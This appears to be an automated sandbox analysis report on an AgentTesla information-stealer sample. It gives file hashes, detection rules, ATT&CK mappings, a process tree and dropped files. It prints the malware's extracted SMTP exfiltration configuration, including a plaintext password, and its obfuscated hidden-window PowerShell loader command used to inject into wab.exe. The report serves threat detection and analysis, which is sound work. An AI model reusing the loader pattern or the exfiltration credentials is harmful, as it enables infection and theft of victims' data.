agenttesla | c28ec21beda0688372e11e53a55f494fd0278929322019739c0084638716a3ba

General

Target

c28ec21beda0688372e11e53a55f494fd0278929322019739c0084638716a3ba.exe
Size

597KB
MD5

01fcb8fb62b7bcf6fa81e765d0c3f571
SHA1

2fb9a233ba5c4ec26c275b10300b2e5b57baa435
SHA256

c28ec21beda0688372e11e53a55f494fd0278929322019739c0084638716a3ba
SHA512

059f448f4db5e4ca667bc2a7fec0f45705aa9217bdb0bce701670df75cb29739cea2cdd4f1123cd6ff8d164d8552448b28def00c88ae1ff850f8cca0667230ec
SSDEEP

12288:1oGrkbKNHKTGwvqXsIkkTLlrvK94BPbSGgW:1oGIbIHKT7vCgk3lLu61n

Score

10^/10

agenttesla execution keylogger spyware stealer trojan

Malware Config

Extracted

Family

agenttesla

Credentials

Protocol: smtp
Host:
mmppf.com
Port:
587
Username:
[email protected]
Password:
Tbk@Saudi#2030
Email To:
[email protected]

Signatures

AgentTesla
Agent Tesla is a remote access tool (RAT) written in visual basic.
keylogger trojan stealer spyware agenttesla

Detect packed .NET executables. Mostly AgentTeslaV4. 2 IoCs

resource	yara_rule
behavioral1/memory/1968-124-0x0000000000760000-0x00000000017C2000-memory.dmp	INDICATOR_EXE_Packed_GEN01
behavioral1/memory/1968-125-0x0000000000760000-0x00000000007A0000-memory.dmp	INDICATOR_EXE_Packed_GEN01

Detects binaries (Windows and macOS) referencing many web browsers. Observed in information stealers. 2 IoCs

resource	yara_rule
behavioral1/memory/1968-124-0x0000000000760000-0x00000000017C2000-memory.dmp	INDICATOR_SUSPICIOUS_Binary_References_Browsers
behavioral1/memory/1968-125-0x0000000000760000-0x00000000007A0000-memory.dmp	INDICATOR_SUSPICIOUS_Binary_References_Browsers

Detects executables referencing Windows vault credential objects. Observed in infostealers 2 IoCs

resource	yara_rule
behavioral1/memory/1968-124-0x0000000000760000-0x00000000017C2000-memory.dmp	INDICATOR_SUSPICIOUS_EXE_VaultSchemaGUID
behavioral1/memory/1968-125-0x0000000000760000-0x00000000007A0000-memory.dmp	INDICATOR_SUSPICIOUS_EXE_VaultSchemaGUID

Detects executables referencing many confidential data stores found in browsers, mail clients, cryptocurreny wallets, etc. Observed in information stealers 2 IoCs

resource	yara_rule
behavioral1/memory/1968-124-0x0000000000760000-0x00000000017C2000-memory.dmp	INDICATOR_SUSPICIOUS_EXE_References_Confidential_Data_Store
behavioral1/memory/1968-125-0x0000000000760000-0x00000000007A0000-memory.dmp	INDICATOR_SUSPICIOUS_EXE_References_Confidential_Data_Store

Detects executables referencing many email and collaboration clients. Observed in information stealers 2 IoCs

resource	yara_rule
behavioral1/memory/1968-124-0x0000000000760000-0x00000000017C2000-memory.dmp	INDICATOR_SUSPICIOUS_EXE_References_Messaging_Clients
behavioral1/memory/1968-125-0x0000000000760000-0x00000000007A0000-memory.dmp	INDICATOR_SUSPICIOUS_EXE_References_Messaging_Clients

Detects executables referencing many file transfer clients. Observed in information stealers 2 IoCs

resource	yara_rule
behavioral1/memory/1968-124-0x0000000000760000-0x00000000017C2000-memory.dmp	INDICATOR_SUSPICIOUS_EXE_Referenfces_File_Transfer_Clients
behavioral1/memory/1968-125-0x0000000000760000-0x00000000007A0000-memory.dmp	INDICATOR_SUSPICIOUS_EXE_Referenfces_File_Transfer_Clients

Command and Scripting Interpreter: PowerShell 1 TTPs 1 IoCs

Run Powershell and hide display window.

execution

PowerShell

T1059.001

pid	Process
2708	powershell.exe

Legitimate hosting services abused for malware hosting/C2 1 TTPs 2 IoCs

Web Service

T1102

flow	ioc
3	drive.google.com
5	drive.google.com

Drops file in System32 directory 5 IoCs

description	ioc	Process
File opened for modification	C:\Windows\SysWOW64\playgoers.sep	c28ec21beda0688372e11e53a55f494fd0278929322019739c0084638716a3ba.exe
File created	C:\Windows\SysWOW64\bores.lnk	c28ec21beda0688372e11e53a55f494fd0278929322019739c0084638716a3ba.exe
File opened for modification	C:\Windows\SysWOW64\bores.lnk	c28ec21beda0688372e11e53a55f494fd0278929322019739c0084638716a3ba.exe
File created	C:\Windows\SysWOW64\Pentose.lnk	c28ec21beda0688372e11e53a55f494fd0278929322019739c0084638716a3ba.exe
File opened for modification	C:\Windows\SysWOW64\Pentose.lnk	c28ec21beda0688372e11e53a55f494fd0278929322019739c0084638716a3ba.exe

Suspicious use of NtCreateThreadExHideFromDebugger 1 IoCs

pid	Process
1968	wab.exe

Suspicious use of NtSetInformationThreadHideFromDebugger 2 IoCs

pid	Process
2708	powershell.exe
1968	wab.exe

Suspicious use of SetThreadContext 1 IoCs

description	pid	Process	procid_target
PID 2708 set thread context of 1968	2708	powershell.exe	32

Drops file in Program Files directory 4 IoCs

description	ioc	Process
File opened for modification	C:\Program Files (x86)\Common Files\Vaginismus.ini	c28ec21beda0688372e11e53a55f494fd0278929322019739c0084638716a3ba.exe
File opened for modification	C:\Program Files (x86)\Common Files\nvningedomstol\arbejdskommando.sto	c28ec21beda0688372e11e53a55f494fd0278929322019739c0084638716a3ba.exe
File opened for modification	C:\Program Files (x86)\Common Files\Pygopagus172\matthfus.ala	c28ec21beda0688372e11e53a55f494fd0278929322019739c0084638716a3ba.exe
File opened for modification	C:\Program Files (x86)\Common Files\lnstigningsmnstre\Ccny.sta	c28ec21beda0688372e11e53a55f494fd0278929322019739c0084638716a3ba.exe

Drops file in Windows directory 4 IoCs

description	ioc	Process
File opened for modification	C:\Windows\yer.ini	c28ec21beda0688372e11e53a55f494fd0278929322019739c0084638716a3ba.exe
File opened for modification	C:\Windows\truthlessly\Stablish.ini	c28ec21beda0688372e11e53a55f494fd0278929322019739c0084638716a3ba.exe
File opened for modification	C:\Windows\resources\0409\ejerlst.uns	c28ec21beda0688372e11e53a55f494fd0278929322019739c0084638716a3ba.exe
File opened for modification	C:\Windows\resources\fysiurg\Cheesecutter.ini	c28ec21beda0688372e11e53a55f494fd0278929322019739c0084638716a3ba.exe

Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Information Discovery
T1082

Suspicious behavior: EnumeratesProcesses 8 IoCs

pid	Process
2708	powershell.exe
2708	powershell.exe
2708	powershell.exe
2708	powershell.exe
2708	powershell.exe
2708	powershell.exe
1968	wab.exe
1968	wab.exe

Suspicious behavior: MapViewOfSection 1 IoCs

pid	Process
2708	powershell.exe

Suspicious use of AdjustPrivilegeToken 2 IoCs

description	pid	Process
Token: SeDebugPrivilege	2708	powershell.exe
Token: SeDebugPrivilege	1968	wab.exe

Suspicious use of SetWindowsHookEx 1 IoCs

pid	Process
1968	wab.exe

Suspicious use of WriteProcessMemory 14 IoCs

description	pid	Process	procid_target
PID 2032 wrote to memory of 2708	2032	c28ec21beda0688372e11e53a55f494fd0278929322019739c0084638716a3ba.exe	28
PID 2032 wrote to memory of 2708	2032	c28ec21beda0688372e11e53a55f494fd0278929322019739c0084638716a3ba.exe	28
PID 2032 wrote to memory of 2708	2032	c28ec21beda0688372e11e53a55f494fd0278929322019739c0084638716a3ba.exe	28
PID 2032 wrote to memory of 2708	2032	c28ec21beda0688372e11e53a55f494fd0278929322019739c0084638716a3ba.exe	28
PID 2708 wrote to memory of 2920	2708	powershell.exe	30
PID 2708 wrote to memory of 2920	2708	powershell.exe	30
PID 2708 wrote to memory of 2920	2708	powershell.exe	30
PID 2708 wrote to memory of 2920	2708	powershell.exe	30
PID 2708 wrote to memory of 1968	2708	powershell.exe	32
PID 2708 wrote to memory of 1968	2708	powershell.exe	32
PID 2708 wrote to memory of 1968	2708	powershell.exe	32
PID 2708 wrote to memory of 1968	2708	powershell.exe	32
PID 2708 wrote to memory of 1968	2708	powershell.exe	32
PID 2708 wrote to memory of 1968	2708	powershell.exe	32

C:\Users\Admin\AppData\Local\Temp\c28ec21beda0688372e11e53a55f494fd0278929322019739c0084638716a3ba.exe
"C:\Users\Admin\AppData\Local\Temp\c28ec21beda0688372e11e53a55f494fd0278929322019739c0084638716a3ba.exe"
1⤵
- Drops file in System32 directory
- Drops file in Program Files directory
- Drops file in Windows directory
- Suspicious use of WriteProcessMemory
PID:2032
- C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
  "powershell.exe" -windowstyle hidden "$Gelpjen=Get-Content 'C:\Users\Admin\AppData\Local\Temp\fingerstningerne\flagellulae\Usmmeligheds.Tro';$Anigonus=$Gelpjen.SubString(51086,3);.$Anigonus($Gelpjen)"
  2⤵
  - Command and Scripting Interpreter: PowerShell
  - Suspicious use of NtSetInformationThreadHideFromDebugger
  - Suspicious use of SetThreadContext
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious behavior: MapViewOfSection
  - Suspicious use of AdjustPrivilegeToken
  - Suspicious use of WriteProcessMemory
  PID:2708
- - C:\Windows\SysWOW64\cmd.exe
    "C:\Windows\system32\cmd.exe" "/c set /A 1^^0"
    3⤵
    PID:2920
- - C:\Program Files (x86)\windows mail\wab.exe
    "C:\Program Files (x86)\windows mail\wab.exe"
    3⤵
    - Suspicious use of NtCreateThreadExHideFromDebugger
    - Suspicious use of NtSetInformationThreadHideFromDebugger
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
    - Suspicious use of SetWindowsHookEx
    PID:1968

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Command and Scripting Interpreter

1

T1059

PowerShell

1

T1059.001

Persistence

Privilege Escalation

Defense Evasion

Credential Access

Discovery

System Information Discovery

1

T1082

Lateral Movement

Collection

Command and Control

Web Service

1

T1102

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\Local\Temp\fingerstningerne\flagellulae\Energiudfoldelsernes.Unt

Filesize
326KB

MD5
7aeba7b845e6a65ab44f5a6edd1b1469

SHA1
b6aa079f69c563d7733cbdbe3e61ef2ab6d9448a

SHA256
2649f588f147abad2045a8c4f28f7359a9e4525b913b9fb2ef834b28e8469e1c

SHA512
c4fa01f0b7e19f8349fef887e0b8eab9ddc8708eb6cef00f700e30309a00a27fac6fd05dfd456a4b2836aefa1e6ba6cf0830c5ede6d860e6f6275618c7d3713d

Download Submit
C:\Users\Admin\AppData\Local\Temp\fingerstningerne\flagellulae\Usmmeligheds.Tro

Filesize
49KB

MD5
effee95945c050b65310d4e05a17d897

SHA1
663db609ae44ccf619242830ca0b6fd20ec481f8

SHA256
6439dc73d1ce981c431de40f0a01210c6c14e202bf02c5b2047db7bcf2cca9a6

SHA512
bcadab2333af674c6cefdcd3ae0b87016a77fb7908c5b80326ec372642c46f67548623263a889a645945c1bb1e8f0035b199abe461709ab84128e2af7c3a6db2

Download Submit
C:\Windows\SysWOW64\bores.lnk

Filesize
1KB

MD5
e5101611a7d6d7b8cd93b76c7253bf27

SHA1
cb4d5a1c2dfefe27de30000c19283e881a385407

SHA256
d8ef23c80a92ed65a8ccdd3bf6c114848344ced1bc6f7bdbf28a04d22c132ee7

SHA512
4eb32e13803946fafb1044817b903222e142e709e36bfafe490311108f9d066f8e74a73191450793f1076fdbcb9b87c5ea0f39915600aaedbb5a85c1bed5be2c

Download Submit
C:\Windows\yer.ini

Filesize
38B

MD5
e58f8a2dcf15a626bc785906a24d269a

SHA1
451f8692070432dbd0232c61631cb49874323fd7

SHA256
39b313e3f6e503de2657691e96235891834d12dab42957e62aea1c588c35bc83

SHA512
7c33aec2758c72eb727f156ca5946626409a1b2ad22a980801436acacac1bf05eac231a2a0cc2858d369a54cbfa3cafdbd449ce696bf6c8fcecfb53699a75bd3

Download Submit
memory/1968-125-0x0000000000760000-0x00000000007A0000-memory.dmp

Filesize
256KB

Download
memory/1968-124-0x0000000000760000-0x00000000017C2000-memory.dmp

Filesize
16.4MB

Download
memory/1968-123-0x0000000000760000-0x00000000017C2000-memory.dmp

Filesize
16.4MB

Download
memory/2708-97-0x0000000073EB0000-0x000000007445B000-memory.dmp

Filesize
5.7MB

Download
memory/2708-96-0x0000000073EB0000-0x000000007445B000-memory.dmp

Filesize
5.7MB

Download
memory/2708-100-0x0000000006980000-0x000000000A2E4000-memory.dmp

Filesize
57.4MB

Download
memory/2708-101-0x0000000073EB0000-0x000000007445B000-memory.dmp

Filesize
5.7MB

Download
memory/2708-95-0x0000000073EB0000-0x000000007445B000-memory.dmp

Filesize
5.7MB

Download
memory/2708-94-0x0000000073EB0000-0x000000007445B000-memory.dmp

Filesize
5.7MB

Download
memory/2708-87-0x0000000073EB1000-0x0000000073EB2000-memory.dmp

Filesize
4KB

Download

Analysis

Sharing